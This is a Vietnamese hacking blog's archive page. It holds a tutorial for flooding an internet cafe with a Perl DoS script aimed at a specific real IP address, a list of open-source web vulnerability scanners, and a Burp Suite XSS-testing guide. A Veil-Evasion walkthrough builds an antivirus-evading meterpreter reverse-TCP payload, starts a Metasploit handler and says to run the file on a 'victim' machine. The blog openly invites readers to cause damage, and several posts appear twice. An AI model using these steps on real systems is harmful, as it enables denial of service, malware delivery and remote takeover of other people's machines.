Hôm nay max rảnh nên share cho m.n phá hoại chút , à mà nhắn tới mấy thanh niên trẩu nghịch ít thôi nhé !!!
DOWNLOAD HERE
Home
»
Archives for
April 2016
HƯỚNG DẪN LÀM ĐƠ CẢ TIỆM NET BY Jo3
Nguồn Jo3
để đánh dấu sự trở lại của Jo3
b1 : tải Perl và cài đặt (mình cài rồi)
tải code về mã hóa MD5 m.n giải ra nhé feaadce99387693dfb6a16ca483627dd
DOWNLOAD
b2 : mở cmd ra
đến ổ chứa thư mục perl thường là ổ c
cd Perl
mở file
jo3.pl 115.146.126.227 80 1000 300
như thế này
đó nhấn enter là xong nếu muốn thoát ấn ctrl + c
à mà pass của link download mình đã mã hóa md5 r nhé
ai muốn tải thì giả mã rồi down ( chống trẻ trâu )
END TUT
để đánh dấu sự trở lại của Jo3
b1 : tải Perl và cài đặt (mình cài rồi)
tải code về mã hóa MD5 m.n giải ra nhé feaadce99387693dfb6a16ca483627dd
DOWNLOAD
b2 : mở cmd ra
đến ổ chứa thư mục perl thường là ổ c
cd Perl
mở file
jo3.pl 115.146.126.227 80 1000 300
như thế này
đó nhấn enter là xong nếu muốn thoát ấn ctrl + c
à mà pass của link download mình đã mã hóa md5 r nhé
ai muốn tải thì giả mã rồi down ( chống trẻ trâu )
END TUT
14 công cụ mã nguồn mở giúp tìm kiếm lỗ hổng ứng dụng web!
Trong quá khứ nhiều website nổi tiếng đã bị hacker tấn công và gây ra những hậu quả nghiêm trọng gây mất uy tín cho doanh nghiệp. Việc kiểm tra an ninh cho website vô cùng quan trọng nhằm tránh những tổn thất trong tương lai. Việc đánh giá an ninh cho website cần có những chuyên gia có tay nghề với chi phí lớn ngoài ra cần phối hợp sử dụng các công cụ Application Security Scanner để nhanh chóng tìm và đưa ra các bản vá kịp thời đảm bảo an ninh cho các website.
Application Security Scanner là chương trình phần mềm cho phép kiểm tra các lỗ hổng an ninh trên website.
Application Security Scanner với các bản thương mại mang lại hiệu quả khá cao như web Acunetix, bên cạnh đó còn nhiều chương trình webscan mã nguồn mở mang lại hiệu quả khá cao giúp các chuyên gia hay lập trình viên nhanh chóng, đỡ mất thời gian tìm ra các lỗi an ninh trên hệ thống website.
Các bạn không nên nhầm lẫn giữa các chương trình mã nguồn mở với các chương trình miễn phí chúng hoàn toàn khác nhau. Mã nguồn mở là có kho mã nguồn về ứng dụng đó để người dùng có thể tùy biến theo nhiều kiểu khác nhau, có khi được phát triển thành ứng dụng bán lấy tiền có khi chia sẻ miễn phí nhưng tất cả đều phải công bố mã nguồn còn các ứng dụng miễn phí tất nhiên là free nhưng mã nguồn của nó thì chưa biết được.
1. Grabber:
Là một máy quét lỗ hổng ứng dụng web các lỗ hổng mà nó có thể phát hiện:
Cross site scripting
SQL injection
Ajax testing
File inclusion
JS source code analyzer
Backup file check
Công cụ này được đánh giá chạy khá nhanh với các website nhỏ và mất nhiều thời gian với các website lớn.
Cộng cụ này phát triển bằng ngôn ngữ python và không cung cấp trình giao diện nào cho người dùng. Các bạn có thể tùy biến hay nghiên cứu mã nguồn của nó.
Download it here: http://rgaucher.info/beta/grabber/
Source code on Github: https://github.com/neuroo/grabber
2. Vega:
Đây là công cụ phát triển dựa trên ngôn ngữ lập trình java có thể chạy trên nền tảng OSX, Window, Linux.
Công cụ Vega có thể tìm kiếm các lỗ hổng SQL injection, header injection, directory listing, shell injection, cross site scripting, file inclusion và một số lỗ hổng ứng dụng web khác.
Bạn có thể cài đặt số luồng quét tối đã mỗi giây khi bắt đầu kiểm tra 1 website.
Documentation: https://subgraph.com/vega/documentation/index.en.html
Download Vega: https://subgraph.com/vega/
3. Zed Attack Proxy:
Đây là công cụ được phát triển bởi AWASP chạy được trên nền tảng Window, OSX, Unix, Linux. Đây là công cụ đơn giản và dễ sử dụng.
Những tính năng của nó được liệt kê dưới đây:
Intercepting Proxy
Automatic Scanner
Traditional but powerful spiders
Fuzzer
Web Socket Support
Plug-n-hack support
Authentication support
REST based API
Dynamic SSL certificates
Smartcard and Client Digital Certificates support
Download ZAP : http://code.google.com/p/zaproxy/
4. Wapiti :
Đây cũng là một công cụ kiểm tra an ninh website tốt. Phương thức kiểm tra an ninh trên web của nó là quét các đường link và chèn giữ liệu test lên các đối tượng ( texbox...), nó hỗ trợ GET cà POST HTTP. Các lỗ hổng có thể được phát hiện bằng công cụ này:
File Disclosure
File inclusion
Cross Site Scripting (XSS)
Command execution detection
CRLF Injection
SEL Injection and Xpath Injection
Weak .htaccess configuration
Backup files disclosure
Đây là công cụ sử dụng dòng lệnh để thao tác nên dành cho các chuyên gia với các bạn mới bắt đầu thì sẽ khó sử dụng.
Download Wapiti with source code: http://wapiti.sourceforge.net/
5. W3af :
Công cụ kiểm tra an ninh web này được phát triển bằng ngôn ngữ python. Sử dụng công cụ này bạn có thể kiểm tra được hơn 200 lỗ hổng ứng dụng web bao gồm các lỗ hổng nguy hiểm như: SQL injection, Cross-Site Scripting.
Điều đặc biệt là công cụ này được đi kèm với giao diện đồ họa với các tùy chọn cho phép người dùng dễ dàng sử dụng.
Chi tiết hơn về công cụ này:
https://github.com/andresriancho/w3af/
Download it from the official website: http://w3af.org/
6. WebScarab :
Đây không phải một công cụ dành cho người mới bắt đầu vì nó được thiết kế cho những người hiểu biết tốt về HTTP và biết viết mã.
Ngoài các tính năng như các công cụ kiểm tra an ninh website khác công cụ có chức năng như con nhện tự động tìm kiếm các link của mục tiêu và đưa ra các kịch bản nhằm kiểm tra lỗ hổng trên các link đó.
Các lỗ hổng có thể được phát hiện bởi công cụ: SQL injection, XSS< CRLF và nhiều hơn nữa.
Source code of the tool is available on Github: https://github.com/OWASP/OWASP-WebScarab
Download WebScarab here: https://www.owasp.org/index.php/Cate...Scarab_Project
7. Skipfish :
Đây là công cụ viết bằng ngôn ngữ lập trình C. Nó được tối ưu để có thể chạy 2000 request mỗi giây mà không cần quá nhiều CPU máy tính nên tốc độ khá nhanh.
Công cụ này được chạy trên các nền tảng: OSX, Linux, Window.
Download Skipfish or code from GOogle Codes: http://code.google.com/p/skipfish/
8. Ratproxy:
Ratproxy cũng là một công cụ mã nguồn mở kiểm tra an ninh ứng dụng web. Nó hỗ trợ Linux, FreeBSD, MacOS X, và (Cygwin) môi trường Windows.
Công cụ này được thiết kế để khắc phục những vấn đề người dùng thường gặp phải khi sử dụng các công cụ proxy khác để kiểm tra an ninh. Nó có khả năng phân biệt giữa css và mã JavaScript. Nó cũng hỗ trợ giao thức SSL khi kiểm tra an ninh, có nghĩa là bạn cũng có thể xem dữ liệu khi website chạy SSL.
Bạn có thể đọc thêm về công cụ này ở đây: http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Download http://code.google.com/p/ratproxy/
9. SQLMap :
Đây có lẽ là công cụ sử dụng phổ biến nhất và nhiều bạn biết về nó.
QALMap được viết trên ngôn ngữ lập trình Python và chạy bằng command line trên cả 3 nền tảng OSX, Linux, Window.
Bạn có thể tìm hiểu thêm về công cụ này tại:
https://github.com/sqlmapproject/sqlmap
Download SQLMap here: https://github.com/sqlmapproject/sqlmap
10. Wfuzz:
Wfuzz là một công cụ mã nguồn mở tự do có để kiểm tra an ninh ứng dụng web. Nó có thể được sử dụng để thực thi truy vấn GET và POST nhằm phát hiện các lỗ hổng an ninh như SQL, XSS, LDAP và nhiều thứ khác. Nó cũng hỗ trợ cookie fuzzing, multi-threading, SOCK, Proxy, Authentication, parameters brute forcing, multiple proxy...vvv
Đây là công cụ không hỗ trợ giao diện nên các bạn phải dùng dòng lệnh để sử dụng.
Download Wfuzz from code.google.com: http://code.google.com/p/wfuzz/
11. Grendel-Scan:
Đây là công cụ được phát triển bằng ngôn ngữ Java chạy được trên các nền tảng OSX, Linux và Window. Nó giúp các chuyên gia nhanh chóng tìm ra các lỗ hổng ứng dụng web.
Download the tool and source code: http://sourceforge.net/projects/grendel/
12. Watcher:
Khác với các công cụ khác đây là một chương trình thụ động dưới dạng add-on. Để sử dụng nó bạn cần cài đặt Fiddler trước rùi cài thêm add-on Watcher vào.
Là một máy quét thụ động nên nó không gây ảnh hưởng tới website hay cơ sở hạ tầng của website đó.
Download watcher and its source code: http://websecuritytool.codeplex.com/
13. X5S:
Đây của là một add-on của Fiddler để dùng được nó bạn cũng phải cài đặt Fiddler trước.
Download X5S and source code from codeplex: http://xss.codeplex.com/
14. Arachni:
Arachni là một công cụ mã nguồn mở được phát triển để cung cấp một môi trường thử nghiệm thâm nhập. Công cụ này có thể phát hiện các lỗ hổng bảo mật ứng dụng web khác nhau. Nó có thể phát hiện các lỗ hổng khác nhau như SQL Injection, XSS, Local File inclusion, remote file inclusion, unvalidated redirect và nhiều lỗ hổng khác.
Download this tool here: http://www.arachni-scanner.com/
Qua bài viết này các bạn có thể biết thêm một số công cụ giúp tìm kiếm lỗ hổng an ninh website. Bài viết mình chỉ giới thiệu sơ qua về các công cụ trên hy vọng các bạn sẽ có các bài chi tiết giới thiệu tầng công cụ đó để mọi người cùng tìm hiểu.
Nguồn: resources dot infosecinstitute dot com
Application Security Scanner là chương trình phần mềm cho phép kiểm tra các lỗ hổng an ninh trên website.
Application Security Scanner với các bản thương mại mang lại hiệu quả khá cao như web Acunetix, bên cạnh đó còn nhiều chương trình webscan mã nguồn mở mang lại hiệu quả khá cao giúp các chuyên gia hay lập trình viên nhanh chóng, đỡ mất thời gian tìm ra các lỗi an ninh trên hệ thống website.
Các bạn không nên nhầm lẫn giữa các chương trình mã nguồn mở với các chương trình miễn phí chúng hoàn toàn khác nhau. Mã nguồn mở là có kho mã nguồn về ứng dụng đó để người dùng có thể tùy biến theo nhiều kiểu khác nhau, có khi được phát triển thành ứng dụng bán lấy tiền có khi chia sẻ miễn phí nhưng tất cả đều phải công bố mã nguồn còn các ứng dụng miễn phí tất nhiên là free nhưng mã nguồn của nó thì chưa biết được.
1. Grabber:
Là một máy quét lỗ hổng ứng dụng web các lỗ hổng mà nó có thể phát hiện:
Cross site scripting
SQL injection
Ajax testing
File inclusion
JS source code analyzer
Backup file check
Công cụ này được đánh giá chạy khá nhanh với các website nhỏ và mất nhiều thời gian với các website lớn.
Cộng cụ này phát triển bằng ngôn ngữ python và không cung cấp trình giao diện nào cho người dùng. Các bạn có thể tùy biến hay nghiên cứu mã nguồn của nó.
Download it here: http://rgaucher.info/beta/grabber/
Source code on Github: https://github.com/neuroo/grabber
2. Vega:
Đây là công cụ phát triển dựa trên ngôn ngữ lập trình java có thể chạy trên nền tảng OSX, Window, Linux.
Công cụ Vega có thể tìm kiếm các lỗ hổng SQL injection, header injection, directory listing, shell injection, cross site scripting, file inclusion và một số lỗ hổng ứng dụng web khác.
Bạn có thể cài đặt số luồng quét tối đã mỗi giây khi bắt đầu kiểm tra 1 website.
Documentation: https://subgraph.com/vega/documentation/index.en.html
Download Vega: https://subgraph.com/vega/
3. Zed Attack Proxy:
Đây là công cụ được phát triển bởi AWASP chạy được trên nền tảng Window, OSX, Unix, Linux. Đây là công cụ đơn giản và dễ sử dụng.
Những tính năng của nó được liệt kê dưới đây:
Intercepting Proxy
Automatic Scanner
Traditional but powerful spiders
Fuzzer
Web Socket Support
Plug-n-hack support
Authentication support
REST based API
Dynamic SSL certificates
Smartcard and Client Digital Certificates support
Download ZAP : http://code.google.com/p/zaproxy/
4. Wapiti :
Đây cũng là một công cụ kiểm tra an ninh website tốt. Phương thức kiểm tra an ninh trên web của nó là quét các đường link và chèn giữ liệu test lên các đối tượng ( texbox...), nó hỗ trợ GET cà POST HTTP. Các lỗ hổng có thể được phát hiện bằng công cụ này:
File Disclosure
File inclusion
Cross Site Scripting (XSS)
Command execution detection
CRLF Injection
SEL Injection and Xpath Injection
Weak .htaccess configuration
Backup files disclosure
Đây là công cụ sử dụng dòng lệnh để thao tác nên dành cho các chuyên gia với các bạn mới bắt đầu thì sẽ khó sử dụng.
Download Wapiti with source code: http://wapiti.sourceforge.net/
5. W3af :
Công cụ kiểm tra an ninh web này được phát triển bằng ngôn ngữ python. Sử dụng công cụ này bạn có thể kiểm tra được hơn 200 lỗ hổng ứng dụng web bao gồm các lỗ hổng nguy hiểm như: SQL injection, Cross-Site Scripting.
Điều đặc biệt là công cụ này được đi kèm với giao diện đồ họa với các tùy chọn cho phép người dùng dễ dàng sử dụng.
Chi tiết hơn về công cụ này:
https://github.com/andresriancho/w3af/
Download it from the official website: http://w3af.org/
6. WebScarab :
Đây không phải một công cụ dành cho người mới bắt đầu vì nó được thiết kế cho những người hiểu biết tốt về HTTP và biết viết mã.
Ngoài các tính năng như các công cụ kiểm tra an ninh website khác công cụ có chức năng như con nhện tự động tìm kiếm các link của mục tiêu và đưa ra các kịch bản nhằm kiểm tra lỗ hổng trên các link đó.
Các lỗ hổng có thể được phát hiện bởi công cụ: SQL injection, XSS< CRLF và nhiều hơn nữa.
Source code of the tool is available on Github: https://github.com/OWASP/OWASP-WebScarab
Download WebScarab here: https://www.owasp.org/index.php/Cate...Scarab_Project
7. Skipfish :
Đây là công cụ viết bằng ngôn ngữ lập trình C. Nó được tối ưu để có thể chạy 2000 request mỗi giây mà không cần quá nhiều CPU máy tính nên tốc độ khá nhanh.
Công cụ này được chạy trên các nền tảng: OSX, Linux, Window.
Download Skipfish or code from GOogle Codes: http://code.google.com/p/skipfish/
8. Ratproxy:
Ratproxy cũng là một công cụ mã nguồn mở kiểm tra an ninh ứng dụng web. Nó hỗ trợ Linux, FreeBSD, MacOS X, và (Cygwin) môi trường Windows.
Công cụ này được thiết kế để khắc phục những vấn đề người dùng thường gặp phải khi sử dụng các công cụ proxy khác để kiểm tra an ninh. Nó có khả năng phân biệt giữa css và mã JavaScript. Nó cũng hỗ trợ giao thức SSL khi kiểm tra an ninh, có nghĩa là bạn cũng có thể xem dữ liệu khi website chạy SSL.
Bạn có thể đọc thêm về công cụ này ở đây: http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Download http://code.google.com/p/ratproxy/
9. SQLMap :
Đây có lẽ là công cụ sử dụng phổ biến nhất và nhiều bạn biết về nó.
QALMap được viết trên ngôn ngữ lập trình Python và chạy bằng command line trên cả 3 nền tảng OSX, Linux, Window.
Bạn có thể tìm hiểu thêm về công cụ này tại:
https://github.com/sqlmapproject/sqlmap
Download SQLMap here: https://github.com/sqlmapproject/sqlmap
10. Wfuzz:
Wfuzz là một công cụ mã nguồn mở tự do có để kiểm tra an ninh ứng dụng web. Nó có thể được sử dụng để thực thi truy vấn GET và POST nhằm phát hiện các lỗ hổng an ninh như SQL, XSS, LDAP và nhiều thứ khác. Nó cũng hỗ trợ cookie fuzzing, multi-threading, SOCK, Proxy, Authentication, parameters brute forcing, multiple proxy...vvv
Đây là công cụ không hỗ trợ giao diện nên các bạn phải dùng dòng lệnh để sử dụng.
Download Wfuzz from code.google.com: http://code.google.com/p/wfuzz/
11. Grendel-Scan:
Đây là công cụ được phát triển bằng ngôn ngữ Java chạy được trên các nền tảng OSX, Linux và Window. Nó giúp các chuyên gia nhanh chóng tìm ra các lỗ hổng ứng dụng web.
Download the tool and source code: http://sourceforge.net/projects/grendel/
12. Watcher:
Khác với các công cụ khác đây là một chương trình thụ động dưới dạng add-on. Để sử dụng nó bạn cần cài đặt Fiddler trước rùi cài thêm add-on Watcher vào.
Là một máy quét thụ động nên nó không gây ảnh hưởng tới website hay cơ sở hạ tầng của website đó.
Download watcher and its source code: http://websecuritytool.codeplex.com/
13. X5S:
Đây của là một add-on của Fiddler để dùng được nó bạn cũng phải cài đặt Fiddler trước.
Download X5S and source code from codeplex: http://xss.codeplex.com/
14. Arachni:
Arachni là một công cụ mã nguồn mở được phát triển để cung cấp một môi trường thử nghiệm thâm nhập. Công cụ này có thể phát hiện các lỗ hổng bảo mật ứng dụng web khác nhau. Nó có thể phát hiện các lỗ hổng khác nhau như SQL Injection, XSS, Local File inclusion, remote file inclusion, unvalidated redirect và nhiều lỗ hổng khác.
Download this tool here: http://www.arachni-scanner.com/
Qua bài viết này các bạn có thể biết thêm một số công cụ giúp tìm kiếm lỗ hổng an ninh website. Bài viết mình chỉ giới thiệu sơ qua về các công cụ trên hy vọng các bạn sẽ có các bài chi tiết giới thiệu tầng công cụ đó để mọi người cùng tìm hiểu.
Nguồn: resources dot infosecinstitute dot com
Phát hiện lỗ hổng XSS chính xác, nhanh gọn với Burp Suite và PhantomJS
XSS hiện nay là một loại lỗ hổng web ngày càng trở nên phổ biến và nguy hiểm. Trong bài này mình sẽ hướng dẫn các bạn cách tìm lỗ hổng web một cách nhanh chóng, tiện lợi và chính xác sử dụng Burp Suite và PhantomJS.
Yêu cầu:
Cài đặt tiện ích mở rộng
Mở Burp Suite, điều hướng tới tab extender sau đó click nút Add, như hình dưới đây:
Chắc chắn rằng, loại của tiện ích mở rộng phải là Java, sau đó click Select file và chỉ tới đường dẫn file xssValidator.jar mà bạn vừa tải ở bước trên.
Click Add và một cửa sổ sẽ xuất hiện. Chắc chắn rằng không có bất kỳ một lỗi nào xảy ra khi click vào tab error. Nếu có lổi xảy ra thì khả năng cao là do bản java của bạn không phù hợp.
Sau khi thêm tiện ích mở rộng này, bạn sẽ nhìn thấy một items mới xuất hiện trong giao diện của Burp Suite Extensions, như hình dươi:
Chuẩn bị tấn công:
Tạo một Intruder attack cho yêu cầu mục tiêu. Xác định mục tiêu như bạn muốn và điều hướng tới tab Payload. Lựa chọn loại payload là extension-generated, như hình dưới:
Click vào Select Generator, và chọn XSS Validator Payload trong payload generator
Click Add và chọn Invoke Burp Extension thì menu thả xuống. Chọn XSS Validator processor, và click ok.
Xác định vị trí Payload, trong ví dụ này mình sử dụng file xsstest.php file có lỗ hổng XSS ở tham số GET.
Dưới tab options, điều hướng tới mục Grep - Match, và nhập ký tự "fy7sdufsuidfhuisdf". Ký tự này sẽ được trả về nếu lỗ hổng XSS được khai thác thành công.
Khởi động PhantomJS server, bằng việc điều hướng tới đường dẫn của phantomjs và khởi chạy phantomjs xss.js. Sau khi thực hiện lệnh này, bạn sẽ thấy như hình dưới:
Quay trở lại Burp Suite Intruder Attack và bắt đầu chạy tấn công. Payload mà kích hoạt thành công XSS sẽ được làm nổi bật bằng việc đánh dấu tích ở "fy7sdufsuidfhuisdf"flag, như hình dưới:
Để kiểm tra lại, bạn đơn giản chỉ cần lấy payload ở những dòng này và kích hoạt lại trên trình duyệt là ok.
Yêu cầu:
- Java 7.0 trở lên
- PhantomJS (thông tin thêm tại http://phantomjs.org)
- BurpSuite
- Có kiến thức cơ bản về việc sử dụng Burp Suite và kiến thức về XSS
Cài đặt tiện ích mở rộng
Mở Burp Suite, điều hướng tới tab extender sau đó click nút Add, như hình dưới đây:
Chắc chắn rằng, loại của tiện ích mở rộng phải là Java, sau đó click Select file và chỉ tới đường dẫn file xssValidator.jar mà bạn vừa tải ở bước trên.
Click Add và một cửa sổ sẽ xuất hiện. Chắc chắn rằng không có bất kỳ một lỗi nào xảy ra khi click vào tab error. Nếu có lổi xảy ra thì khả năng cao là do bản java của bạn không phù hợp.
Sau khi thêm tiện ích mở rộng này, bạn sẽ nhìn thấy một items mới xuất hiện trong giao diện của Burp Suite Extensions, như hình dươi:
Chuẩn bị tấn công:
Tạo một Intruder attack cho yêu cầu mục tiêu. Xác định mục tiêu như bạn muốn và điều hướng tới tab Payload. Lựa chọn loại payload là extension-generated, như hình dưới:
Click vào Select Generator, và chọn XSS Validator Payload trong payload generator
Click Add và chọn Invoke Burp Extension thì menu thả xuống. Chọn XSS Validator processor, và click ok.
Xác định vị trí Payload, trong ví dụ này mình sử dụng file xsstest.php file có lỗ hổng XSS ở tham số GET.
Dưới tab options, điều hướng tới mục Grep - Match, và nhập ký tự "fy7sdufsuidfhuisdf". Ký tự này sẽ được trả về nếu lỗ hổng XSS được khai thác thành công.
Khởi động PhantomJS server, bằng việc điều hướng tới đường dẫn của phantomjs và khởi chạy phantomjs xss.js. Sau khi thực hiện lệnh này, bạn sẽ thấy như hình dưới:
Quay trở lại Burp Suite Intruder Attack và bắt đầu chạy tấn công. Payload mà kích hoạt thành công XSS sẽ được làm nổi bật bằng việc đánh dấu tích ở "fy7sdufsuidfhuisdf"flag, như hình dưới:
Để kiểm tra lại, bạn đơn giản chỉ cần lấy payload ở những dòng này và kích hoạt lại trên trình duyệt là ok.
Hướng dẫn dùng Veil tạo payload bypass antivirus
1. Veil là gì?
Veil được biết đến như là một công cụ có khả năng vượt qua những trình diệt virus cơ bản được dùng trong hoạt động pentesting. Veil làm việc này bằng cách tạo ra một payloads ngẫu nhiên và duy nhất.Chúng ta có thể so sánh những payloads này giống nhưng những malware đa hình, khác nhau giữa host này với host kia. Những payloads này hay hơn những malware truyền thống ở chỗ nó có khả năng thay đổi chữ ký – điều mà một chương trình diệt virus thường dùng (tất nhiên là chương trình diệt virus còn dùng cách khác) để xác định malware. Những mã khai thác của Veil tương thích với hầu hết những công cụ pentest như Metasploit.
2. Dùng như thế nào?
Bài này tác giả sử dụng Kali Linux làm máy tấn công và một máy tính khác chạy Windows XP SP2 với chương trình diệt virus ClamWin. Tác giả khẳng định nó hoạt động với các chương trình diệt virus cơ bản khác.
Bài này tác giả sử dụng Kali Linux làm máy tấn công và một máy tính khác chạy Windows XP SP2 với chương trình diệt virus ClamWin. Tác giả khẳng định nó hoạt động với các chương trình diệt virus cơ bản khác.
Đầu tiên là cài Veil vì nó không được tích hợp sẵn trên Kali Linux
root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
root@kali:~# unzip master
root@kali:~# cd Veil-Evasion-master/setup
root@kali:~/Veil-Evasion-master/setup# ./setup.sh
Chạy veil
root@kali:~/Veil-Evasion-master/setup# cd ..
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
Bạn sẽ thấy một menu tương tác như thế này:
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================Main Menu39 payloads loadedAvailable commands:use use a specific payloadinfo information on a specific payloadlist list available payloadsupdate update Veil to the latest versionclean clean out payload folderscheckvt check payload hashes vs. VirusTotalexit exit Veil[>] Please enter a command:Dùng thử những command để hiểu hơn về Veil, ví dụ như list, info..
Veil-Evasion | [Version]: 2.16.0=========================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=========================================================================Payload information:Name: python/meterpreter/rev_tcpLanguage: pythonRating: ExcellentDescription: pure windows/meterpreter/reverse_tcp stager, noshellcodeRequired Options:Name Current Value Description—- ————- ———–LHOST IP of the metasploit handlerLPORT 4444 Port of the metasploit handlercompile_to_exe Y Compile to an executableexpire_payload X Optional: Payloads expire after “X” daysuse_pyherion N Use the pyherion encrypter
Để dùng một payload thì bạn chọn command use và mã số payloads có được từ lệnh list
[>] Please enter a command: use 26=========================================================================Veil-Evasion | [Version]: 2.16.0=========================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=========================================================================Payload: python/meterpreter/rev_tcp loadedRequired Options:Name Current Value Description—- ————- ———–LHOST IP of the metasploit handlerLPORT 4444 Port of the metasploit handlercompile_to_exe Y Compile to an executableexpire_payload X Optional: Payloads expire after “X” daysuse_pyherion N Use the pyherion encrypterAvailable commands:set set a specific option valueinfo show information about the payloadgenerate generate payloadback go to the main menuexit exit Veil[>] Please enter a command: set LHOST 192.168.0.14[>] Please enter a command: generate=========================================================================Veil-Evasion | [Version]: 2.16.0=========================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=========================================================================[*] Press [enter] for ‘payload’[>] Please enter the base name for output files: testPayload[?] How would you like to create your payload executable?1 – Pyinstaller (default)2 – Pwnstaller (obfuscated Pyinstaller loader)3 – Py2Exe[>] Please enter the number of your choice: 1err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec176 INFO: Testing for ability to set icons, version resources…189 INFO: … resource update available191 INFO: UPX is not available.1707 INFO: checking Analysis1707 INFO: building Analysis because out00-Analysis.toc non existent1707 INFO: running Analysis out00-Analysis.toc1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww …1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest1720 INFO: Searching for file msvcr90.dll1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll1720 INFO: Searching for file msvcp90.dll1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll1720 INFO: Searching for file msvcm90.dll1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py4082 INFO: Hidden import ‘encodings’ has been found otherwise4084 INFO: Looking for run-time hooks4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt4911 INFO: checking PYZ4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing4911 INFO: building PYZ out00-PYZ.toc5546 INFO: checking PKG5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing5546 INFO: building PKG out00-PKG.pkg6628 INFO: checking EXE6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing6628 INFO: building EXE from out00-EXE.toc6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe=========================================================================Veil-Evasion | [Version]: 2.16.0=========================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=========================================================================[*] Executable written to: /usr/share/veil-output/compiled/testPayload.exeLanguage: pythonPayload: python/meterpreter/rev_tcpRequired Options: LHOST=192.168.0.14 LPORT=4444 compile_to_exe=Yexpire_payload=X use_pyherion=NPayload File: /usr/share/veil-output/source/testPayload.pyHandler File: /usr/share/veil-output/handlers/testPayload_handler.rc[*] Your payload files have been generated, don’t get caught![!] And don’t submit samples to any online scanner!
Nó nhắc các bạn là đừng có submit payload này lên mấy trang scan online kìa
Xong, như vậy bạn đã có 1 file exe có khả năng bypass được một số antivirus (hi vọng thế)
Bước tiếp theo là copy file đó lên máy victim và chạy nó. Trên Kali Linux chúng ta sẽ mở một cái handler cho cái reverse tcp
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.0.14LHOST => 192.168.0.14msf exploit(handler) > set LPORT 4444LPORT => 4444msf exploit(handler) > set ExitOnSession falseExitOnSession => falsemsf exploit(handler) > exploit -j
Theo: http://forum.ceh.vn/Huong-dan-dung-Veil-tao-payload-bypass-antivirus-thread-7431-post-28093.ceh#pid28093
Powered by Blogger.
About Me
Blog Archive
-
▼
2016
(111)
-
▼
April
(17)
- Share hơn 40 code DDOS python cho anh em
- Hướng dẫn truy cập DEEP WEB phần 1
- HƯỚNG DẪN LÀM ĐƠ CẢ TIỆM NET BY Jo3
- SHARE code index Hacker
- 14 công cụ mã nguồn mở giúp tìm kiếm lỗ hổng ứng d...
- Phát hiện lỗ hổng XSS chính xác, nhanh gọn với Bur...
- Hướng dẫn dùng Veil tạo payload bypass antivirus
- CHECK PASS GMAIL CỰC HOT
- Hướng dẫn đổi Username (Tên người dùng) Facebook l...
- Khai thác Password được lưu trên Website bằng Goog...
- Crack MẬT KHẨU WIFI WPA/WPA2 bằng HT-WPS.
- THỦ THUẬT VUI: XEM HÌNH ẢNH BẠN BÈ ĐÃ ẨN TRÊN FACE...
- TỔNG HỢP LINK TẢI CÁC PHẦN MỀM GIÁN ĐIỆP HAY NHẤT
- Tắt máy tính bằng cách gửi mail từ điện thoại
- Các lỗi thường gặp trên laptop và hướng xử lý
- DDOS IP người khác by Jo3
- SHARE Tools Blacklink tự động
-
▼
April
(17)
Ngẫu Nhiên
Bình Luận
Popular
-
1. 000webhost Họ đã được khoảng một thời gian, và họ là khá tốt. lưu trữ 1.5GB 100GB mỗi băng thông tháng 5 lĩnh vực addon 5 địa chỉ email 2...
-
1. Lưu lại nội dung ưa thích Nếu đang lướt News Feed (Bảng tin) mà bắt gặp một liên kết, hình ảnh, địa điểm hay một video đặc sắc nào đó như...
-
https://youtu.be/R1aLTiui0yk 2 TOOLS https://addons.mozilla.org/en-US/firefox/addon/fireforce/ https://www.mozilla.org/en-US/firefox/developer/
-
Yêu cầu: Sạc đầy điện thoại Android Mạng ngon Ít nhất 5GB còn trống Bước 1. Tải về Linux ứng dụng trong điện thoại di động Android từ Google...
-
Đây là những video mình sưu tầm từ nhiều nguồn!! http://www.mediafire.com/download.php?qqtc0ad59vqrrji http://www.mediafire.com/download.ph...
-
Điều đặc biệt là trang web này sẽ cho mỗi thành viên đăng ký là 2mBTC xấp xỉ 10k VNĐ. Có thể các bạn cho là ít nhưng nghĩ xem: nếu bạn có 10...
-
